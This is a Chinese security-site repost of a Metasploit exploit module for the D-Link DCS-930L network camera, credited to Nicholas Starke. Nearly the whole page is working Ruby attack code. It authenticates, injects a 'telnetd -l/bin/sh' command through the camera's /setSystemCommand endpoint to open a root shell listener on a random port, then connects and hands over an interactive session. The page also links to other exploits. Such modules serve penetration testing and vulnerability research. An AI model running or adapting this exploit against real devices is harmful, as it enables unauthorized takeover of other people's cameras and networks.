首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DCS-930L Authenticated Remote Command Execution
来源:metasploit.com 作者:Starke 发布时间:2016-02-14  
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  include Msf::Exploit::Remote::Telnet
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DCS-930L Authenticated Remote Command Execution',
      'Description' => %q{
        The D-Link DCS-930L Network Video Camera is vulnerable
        to OS Command Injection via the web interface.  The vulnerability
        exists at /setSystemCommand, which is accessible with credentials.
        This vulnerability was present in firmware version 2.01 and fixed
        by 2.12.
      },
      'Author'      =>
        [
          'Nicholas Starke <nick@alephvoid.com>'
        ],
      'License'         => MSF_LICENSE,
      'DisclosureDate'  => 'Dec 20 2015',
      'Privileged'      => true,
      'Platform'        => 'unix',
      'Arch'            => ARCH_CMD,
      'Payload'         =>
        {
          'Compat'  => {
          'PayloadType'    => 'cmd_interact',
          'ConnectionType' => 'find',
          },
        },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'Targets'        =>
        [
          [  'Automatic',     { } ],
        ],
      'DefaultTarget'  => 0
     ))
 
    register_options(
      [
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', ''])
      ], self.class)
 
    register_advanced_options(
      [
        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]),
        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
      ], self.class)
  end
 
  def telnet_timeout
    (datastore['TelnetTimeout'] || 10)
  end
 
  def banner_timeout
    (datastore['TelnetBannerTimeout'] || 25)
  end
 
  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD'] || ''
 
    test_login(user, pass)
    exploit_telnet
  end
 
  def test_login(user, pass)
    print_status("#{peer} - Trying to login with #{user} : #{pass}")
 
    res = send_request_cgi({
      'uri' => '/',
      'method' => 'GET',
      'authorization' => basic_auth(user, pass)
    })
 
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200
 
    print_good("#{peer} - Successful login #{user} : #{pass}")
  end
 
  def exploit_telnet
    telnet_port = rand(32767) + 32768
 
    print_status("#{peer} - Telnet Port: #{telnet_port}")
 
    cmd = "telnetd -p #{telnet_port} -l/bin/sh"
 
    telnet_request(cmd)
 
    print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...")
    ctx = { 'Msf' => framework, 'MsfExploit' => self }
    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout })
 
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable")
    end
 
    add_socket(sock)
 
    print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
 
    if prompt.nil?
      sock.close
      fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session")
    else
      print_good("#{rhost}:#{telnet_port} - Telnet session successfully established")
    end
 
    handler(sock)
  end
 
  def telnet_request(cmd)
    uri = '/setSystemCommand'
 
    begin
      res = send_request_cgi({
        'uri' => uri,
        'method' => 'POST',
        'vars_post' => {
          'ReplySuccessPage' => 'docmd.htm',
          'ReplyErrorPage' => 'docmd.htm',
          'SystemCommand'  => cmd,
          'ConfigSystemCommand' => 'Save'
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
 
  def negotiate_telnet(sock)
    begin
      Timeout.timeout(banner_timeout) do
        while(true)
          data = sock.get_once(-1, telnet_timeout)
          return nil if not data or data.length == 0
          if data =~ /BusyBox/
            return true
          end
        end
      end
    rescue ::Timeout::Error
      return nil
    end
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows WebDAV - BSo
·Wieland wieplan 4.1 Document P
·FTPShell Client 5.24 - (Create
·Delta Industrial Automation DC
·Oracle 9i XDB FTP Pass Overflo
·JMX2 Email Tester Remote Shell
·Baumer VeriSens Application Su
·Microsoft Windows - AFD.SYS Da
·yTree 1.94-1.1 - Local Buffer
·Network Scanner Version 4.0.0.
·Toshiba Viewer v2 p3console -
·Inductive Automation Ignition
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved